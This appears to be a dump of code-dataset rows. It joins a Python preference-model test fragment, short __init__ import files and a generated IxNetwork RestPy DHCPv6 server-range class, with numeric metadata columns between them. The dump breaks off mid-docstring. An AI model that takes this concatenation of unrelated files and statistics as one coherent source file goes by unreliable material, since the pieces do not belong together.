BinaryPreferenceModel(link='foo')
def test_fit_simple_probit(self):
with self.test_session():
data = PreferenceDict()
a = (0,)
b = (1,)
c = (2,)
d = (3,)
data[a, b] = 1
data[a, c] = 1
data[c, b] = -1
data[c, d] = 1
m = BinaryPreferenceModel(
n_iter=500,
n_samples=20,
link='probit'
)
X, y = preprocess_data(data)
m.fit(X, y)
mean = m.mean([
(0,),
(1,),
(2,),
(3,),
])
self.assertTrue(
all(x > y for x, y in zip(mean, mean[1:]))
)
def test_fit_simple_logit(self):
with self.test_session():
data = PreferenceDict()
a = (0,)
b = (1,)
c = (2,)
d = (3,)
data[a, b] = 1
data[a, c] = 1
data[c, b] = -1
data[c, d] = 1
m = BinaryPreferenceModel(
n_iter=500,
n_samples=20,
link='logit'
)
X, y = preprocess_data(data)
m.fit(X, y)
mean = m.mean([
(0,),
(1,),
(2,),
(3,),
])
self.assertTrue(
all(x > y for x, y in zip(mean, mean[1:]))
)
if __name__ == "__main__":
tf.test.main()
| 26.819972
| 79
| 0.432534
| 1,958
| 19,069
| 3.983146
| 0.082227
| 0.059495
| 0.082062
| 0.059238
| 0.807924
| 0.768432
| 0.752148
| 0.74907
| 0.745737
| 0.740095
| 0
| 0.030121
| 0.467251
| 19,069
| 710
| 80
| 26.857746
| 0.737573
| 0.012376
| 0
| 0.701695
| 0
| 0
| 0.002498
| 0
| 0
| 0
| 0
| 0
| 0.066102
| 1
| 0.032203
| false
| 0
| 0.015254
| 0.001695
| 0.055932
| 0.001695
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
783df6d6b18bf5bb53686c25c771a64a040033ef
| 116
|
py
|
Python
|
NodeDefender/db/data/icpe/__init__.py
|
CTSNE/NodeDefender
|
24e19f53a27d3b53e599cba8b1448f8f16c0bd5e
|
[
"MIT"
] | 4
|
2016-09-23T17:51:05.000Z
|
2017-03-14T02:52:26.000Z
|
NodeDefender/db/data/icpe/__init__.py
|
CTSNE/NodeDefender
|
24e19f53a27d3b53e599cba8b1448f8f16c0bd5e
|
[
"MIT"
] | 1
|
2016-09-22T11:32:33.000Z
|
2017-11-14T10:00:24.000Z
|
NodeDefender/db/data/icpe/__init__.py
|
CTSNE/NodeDefender
|
24e19f53a27d3b53e599cba8b1448f8f16c0bd5e
|
[
"MIT"
] | 4
|
2016-10-09T19:05:16.000Z
|
2020-05-14T04:00:30.000Z
|
import NodeDefender.db.data.icpe.power
import NodeDefender.db.data.icpe.heat
import NodeDefender.db.data.icpe.event
| 29
| 38
| 0.844828
| 18
| 116
| 5.444444
| 0.444444
| 0.55102
| 0.612245
| 0.734694
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.051724
| 116
| 3
| 39
| 38.666667
| 0.890909
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
1525d96462e0b969aa4988c95c440cb98ca41b2a
| 90
|
py
|
Python
|
openstack_dashboard/dashboards/project/instances/workflows/__init__.py
|
rackerlabs/horizon
|
8914ed95fc8fa44771f5f3ec827e325a5855b60a
|
[
"Apache-2.0"
] | 2
|
2018-10-21T22:30:29.000Z
|
2020-11-21T08:58:31.000Z
|
openstack_dashboard/dashboards/project/instances/workflows/__init__.py
|
e/horizon
|
abbce256b68178ebf42816eb87303292212c1dfe
|
[
"Apache-2.0"
] | null | null | null |
openstack_dashboard/dashboards/project/instances/workflows/__init__.py
|
e/horizon
|
abbce256b68178ebf42816eb87303292212c1dfe
|
[
"Apache-2.0"
] | null | null | null |
from create_instance import *
from update_instance import *
from resize_instance import *
| 22.5
| 29
| 0.833333
| 12
| 90
| 6
| 0.5
| 0.583333
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.133333
| 90
| 3
| 30
| 30
| 0.923077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
157f6dd62ec8d6b3547a63fda461c0b4f3eede9f
| 64,360
|
py
|
Python
|
ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocolstack/dhcpv6serverrange_0d95209617577bbee08b582a2b244a49.py
|
OpenIxia/ixnetwork_restpy
|
f628db450573a104f327cf3c737ca25586e067ae
|
[
"MIT"
] | 20
|
2019-05-07T01:59:14.000Z
|
2022-02-11T05:24:47.000Z
|
ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocolstack/dhcpv6serverrange_0d95209617577bbee08b582a2b244a49.py
|
OpenIxia/ixnetwork_restpy
|
f628db450573a104f327cf3c737ca25586e067ae
|
[
"MIT"
] | 60
|
2019-04-03T18:59:35.000Z
|
2022-02-22T12:05:05.000Z
|
ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocolstack/dhcpv6serverrange_0d95209617577bbee08b582a2b244a49.py
|
OpenIxia/ixnetwork_restpy
|
f628db450573a104f327cf3c737ca25586e067ae
|
[
"MIT"
] | 13
|
2019-05-20T10:48:31.000Z
|
2021-10-06T07:45:44.000Z
|
# MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
from typing import List, Any, Union
class Dhcpv6ServerRange(Base):
"""Manages a range of IP addresses that are configured using DHCP protocol.
The Dhcpv6ServerRange class encapsulates a list of dhcpv6ServerRange resources that are managed by the user.
A list of resources can be retrieved from the server using the Dhcpv6ServerRange.find() method.
The list can be managed by using the Dhcpv6ServerRange.add() and Dhcpv6ServerRange.remove() methods.
"""
__slots__ = ()
_SDM_NAME = 'dhcpv6ServerRange'
_SDM_ATT_MAP = {
'DnsDomain': 'dnsDomain',
'Enabled': 'enabled',
'IpAddress': 'ipAddress',
'IpDns1': 'ipDns1',
'IpDns2': 'ipDns2',
'IpPrefix': 'ipPrefix',
'IpType': 'ipType',
'Name': 'name',
'ObjectId': 'objectId',
'UseRapidCommit': 'useRapidCommit',
}
_SDM_ENUM_MAP = {
}
def __init__(self, parent, list_op=False):
super(Dhcpv6ServerRange, self).__init__(parent, list_op)
@property
def DnsDomain(self):
# type: () -> str
"""
Returns
-------
- str: The domain name to be searched during name resolution advertised in DHCP Offer and Reply messages.
"""
return self._get_attribute(self._SDM_ATT_MAP['DnsDomain'])
@DnsDomain.setter
def DnsDomain(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['DnsDomain'], value)
@property
def Enabled(self):
# type: () -> bool
"""
Returns
-------
- bool: Disabled ranges won't be configured nor validated.
"""
return self._get_attribute(self._SDM_ATT_MAP['Enabled'])
@Enabled.setter
def Enabled(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['Enabled'], value)
@property
def IpAddress(self):
# type: () -> str
"""
Returns
-------
- str: The first IP address allocated by this address pool. The rest of addresses will be sequentially allocated.
"""
return self._get_attribute(self._SDM_ATT_MAP['IpAddress'])
@IpAddress.setter
def IpAddress(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['IpAddress'], value)
@property
def IpDns1(self):
# type: () -> str
"""
Returns
-------
- str: The first DNS address advertised in DHCP Offer and Reply messages.
"""
return self._get_attribute(self._SDM_ATT_MAP['IpDns1'])
@IpDns1.setter
def IpDns1(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['IpDns1'], value)
@property
def IpDns2(self):
# type: () -> str
"""
Returns
-------
- str: The second DNS address advertised in DHCP Offer and Reply messages.
"""
return self._get_attribute(self._SDM_ATT_MAP['IpDns2'])
@IpDns2.setter
def IpDns2(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['IpDns2'], value)
@property
def IpPrefix(self):
# type: () -> int
"""
Returns
-------
- number: The Subnet Prefix length advertised in DHCPv6PD Offer and Reply messages.
"""
return self._get_attribute(self._SDM_ATT_MAP['IpPrefix'])
@IpPrefix.setter
def IpPrefix(self, value):
# type: (int) -> None
self._set_attribute(self._SDM_ATT_MAP['IpPrefix'], value)
@property
def IpType(self):
# type: () -> str
"""
Returns
-------
- str: Defines the version of IP address style to be used for describing the range.
"""
return self._get_attribute(self._SDM_ATT_MAP['IpType'])
@IpType.setter
def IpType(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['IpType'], value)
@property
def Name(self):
# type: () -> str
"""
Returns
-------
- str: Name of range
"""
return self._get_attribute(self._SDM_ATT_MAP['Name'])
@Name.setter
def Name(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['Name'], value)
@property
def ObjectId(self):
# type: () -> str
"""
Returns
-------
- str: Unique identifier for this object
"""
return self._get_attribute(self._SDM_ATT_MAP['ObjectId'])
@property
def UseRapidCommit(self):
# type: () -> bool
"""
Returns
-------
- bool: Enables DHCP server to negotiate leases with rapid commit.
"""
return self._get_attribute(self._SDM_ATT_MAP['UseRapidCommit'])
@UseRapidCommit.setter
def UseRapidCommit(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['UseRapidCommit'], value)
def update(self, DnsDomain=None, Enabled=None, IpAddress=None, IpDns1=None, IpDns2=None, IpPrefix=None, IpType=None, Name=None, UseRapidCommit=None):
# type: (str, bool, str, str, str, int, str, str, bool) -> Dhcpv6ServerRange
"""Updates dhcpv6ServerRange resource on the server.
Args
----
- DnsDomain (str): The domain name to be searched during name resolution advertised in DHCP Offer and Reply messages.
- Enabled (bool): Disabled ranges won't be configured nor validated.
- IpAddress (str): The first IP address allocated by this address pool. The rest of addresses will be sequentially allocated.
- IpDns1 (str): The first DNS address advertised in DHCP Offer and Reply messages.
- IpDns2 (str): The second DNS address advertised in DHCP Offer and Reply messages.
- IpPrefix (number): The Subnet Prefix length advertised in DHCPv6PD Offer and Reply messages.
- IpType (str): Defines the version of IP address style to be used for describing the range.
- Name (str): Name of range
- UseRapidCommit (bool): Enables DHCP server to negotiate leases with rapid commit.
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
def add(self, DnsDomain=None, Enabled=None, IpAddress=None, IpDns1=None, IpDns2=None, IpPrefix=None, IpType=None, Name=None, UseRapidCommit=None):
# type: (str, bool, str, str, str, int, str, str, bool) -> Dhcpv6ServerRange
"""Adds a new dhcpv6ServerRange resource on the server and adds it to the container.
Args
----
- DnsDomain (str): The domain name to be searched during name resolution advertised in DHCP Offer and Reply messages.
- Enabled (bool): Disabled ranges won't be configured nor validated.
- IpAddress (str): The first IP address allocated by this address pool. The rest of addresses will be sequentially allocated.
- IpDns1 (str): The first DNS address advertised in DHCP Offer and Reply messages.
- IpDns2 (str): The second DNS address advertised in DHCP Offer and Reply messages.
- IpPrefix (number): The Subnet Prefix length advertised in DHCPv6PD Offer and Reply messages.
- IpType (str): Defines the version of IP address style to be used for describing the range.
- Name (str): Name of range
- UseRapidCommit (bool): Enables DHCP server to negotiate leases with rapid commit.
Returns
-------
- self: This instance with all currently retrieved dhcpv6ServerRange resources using find and the newly added dhcpv6ServerRange resources available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))
def remove(self):
"""Deletes all the contained dhcpv6ServerRange resources in this instance from the server.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
self._delete()
def find(self, DnsDomain=None, Enabled=None, IpAddress=None, IpDns1=None, IpDns2=None, IpPrefix=None, IpType=None, Name=None, ObjectId=None, UseRapidCommit=None):
# type: (str, bool, str, str, str, int, str, str, str, bool) -> Dhcpv6ServerRange
"""Finds and retrieves dhcpv6ServerRange resources from the server.
All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve dhcpv6ServerRange resources from the server.
To retrieve an exact match ensure the parameter value starts with ^ and ends with $
By default the find method takes no parameters and will retrieve all dhcpv6ServerRange resources from the server.
Args
----
- DnsDomain (str): The domain name to be searched during name resolution advertised in DHCP Offer and Reply messages.
- Enabled (bool): Disabled ranges won't be configured nor validated.
- IpAddress (str): The first IP address allocated by this address pool. The rest of addresses will be sequentially allocated.
- IpDns1 (str): The first DNS address advertised in DHCP Offer and Reply messages.
- IpDns2 (str): The second DNS address advertised in DHCP Offer and Reply messages.
- IpPrefix (number): The Subnet Prefix length advertised in DHCPv6PD Offer and Reply messages.
- IpType (str): Defines the version of IP address style to be used for describing the range.
- Name (str): Name of range
- ObjectId (str): Unique identifier for this object
- UseRapidCommit (bool): Enables DHCP server to negotiate leases with rapid commit.
Returns
-------
- self: This instance with matching dhcpv6ServerRange resources retrieved from the server available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
"""Retrieves a single instance of dhcpv6ServerRange data from the server.
Args
----
- href (str): An href to the instance to be retrieved
Returns
-------
- self: This instance with the dhcpv6ServerRange resources from the server available through an iterator or index
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
def CustomProtocolStack(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the customProtocolStack operation on the server.
Create custom protocol stack under /vport/protocolStack
customProtocolStack(Arg2=list, Arg3=enum, async_operation=bool)
---------------------------------------------------------------
- Arg2 (list(str)): List of plugin types to be added in the new custom stack
- Arg3 (str(kAppend | kMerge | kOverwrite)): Append, merge or overwrite existing protocol stack
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('customProtocolStack', payload=payload, response_object=None)
def DisableProtocolStack(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[str, None]
"""Executes the disableProtocolStack operation on the server.
Disable a protocol under protocolStack using the class name
disableProtocolStack(Arg2=string, async_operation=bool)string
-------------------------------------------------------------
- Arg2 (str): Protocol class name to disable
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns str: Status of the exec
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('disableProtocolStack', payload=payload, response_object=None)
def EnableProtocolStack(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[str, None]
"""Executes the enableProtocolStack operation on the server.
Enable a protocol under protocolStack using the class name
enableProtocolStack(Arg2=string, async_operation=bool)string
------------------------------------------------------------
- Arg2 (str): Protocol class name to enable
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns str: Status of the exec
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('enableProtocolStack', payload=payload, response_object=None)
def Start(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the start operation on the server.
Negotiate sessions for all protocols on all ranges belonging to selected plugins
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
start(async_operation=bool)
---------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
start(Arg2=enum, async_operation=bool)
--------------------------------------
- Arg2 (str(async | sync)): kArray[kObjref=/vport/protocolStack/atm,/vport/protocolStack/atm/dhcpEndpoint,/vport/protocolStack/atm/dhcpEndpoint/ancp,/vport/protocolStack/atm/dhcpEndpoint/range,/vport/protocolStack/atm/dhcpEndpoint/range/ancpRange,/vport/protocolStack/atm/dhcpServerEndpoint,/vport/protocolStack/atm/dhcpServerEndpoint/range,/vport/protocolStack/atm/emulatedRouter,/vport/protocolStack/atm/emulatedRouter/dhcpEndpoint,/vport/protocolStack/atm/emulatedRouter/dhcpEndpoint/ancp,/vport/protocolStack/atm/emulatedRouter/dhcpEndpoint/range,/vport/protocolStack/atm/emulatedRouter/dhcpEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/dhcpEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/dhcpServerEndpoint,/vport/protocolStack/atm/emulatedRouter/dhcpServerEndpoint/range,/vport/protocolStack/atm/emulatedRouter/dhcpServerEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip,/vport/protocolStack/atm/emulatedRouter/ip/ancp,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8PgwEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8SgwEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpUeS5S8SgwEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/smDnsEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/smDnsEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/smDnsEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/twampClient,/vport/protocolStack/atm/emulatedRouter/ip/twampServer,/vport/protocolStack/atm/emulatedRouter/ipEndpoint,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/ancp,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/twampClient,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/twampServer,/vport/protocolStack/atm/emulatedRouterEndpoint,/vport/protocolStack/atm/emulatedRouterEndpoint/range/amtRange,/vport/protocolStack/atm/ip,/vport/protocolStack/atm/ip/ancp,/vport/protocolStack/atm/ip/egtpPcrfEndpoint,/vport/protocolStack/atm/ip/egtpPcrfEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpPcrfEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpPcrfS5S8SgwEndpoint,/vport/protocolStack/atm/ip/egtpPcrfS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpPcrfS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpS5S8PgwEndpoint,/vport/protocolStack/atm/ip/egtpS5S8PgwEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpS5S8PgwEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpS5S8SgwEndpoint,/vport/protocolStack/atm/ip/egtpS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpSgwEndpoint,/vport/protocolStack/atm/ip/egtpSgwEndpoint/range,/vport/protocolStack/atm/ip/egtpSgwEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpSgwEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpUeS5S8SgwEndpoint,/vport/protocolStack/atm/ip/egtpUeS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpUeS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/l2tp,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/amtRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/amtRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/l2tpEndpoint,/vport/protocolStack/atm/ip/l2tpEndpoint/range,/vport/protocolStack/atm/ip/l2tpEndpoint/range/amtRange,/vport/protocolStack/atm/ip/l2tpEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/l2tpEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/ip/l2tpEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/smDnsEndpoint,/vport/protocolStack/atm/ip/smDnsEndpoint/range/amtRange,/vport/protocolStack/atm/ip/smDnsEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/twampClient,/vport/protocolStack/atm/ip/twampServer,/vport/protocolStack/atm/ipEndpoint,/vport/protocolStack/atm/ipEndpoint/ancp,/vport/protocolStack/atm/ipEndpoint/range/amtRange,/vport/protocolStack/atm/ipEndpoint/range/ancpRange,/vport/protocolStack/atm/ipEndpoint/range/twampControlRange,/vport/protocolStack/atm/ipEndpoint/twampClient,/vport/protocolStack/atm/ipEndpoint/twampServer,/vport/protocolStack/atm/pppox,/vport/protocolStack/atm/pppox/ancp,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint/range,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint/range,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint/range/ancpRange,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint/range,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint/range,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint/range/ancpRange,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint/range/dhcpv6ServerRange,/vport/protocolSt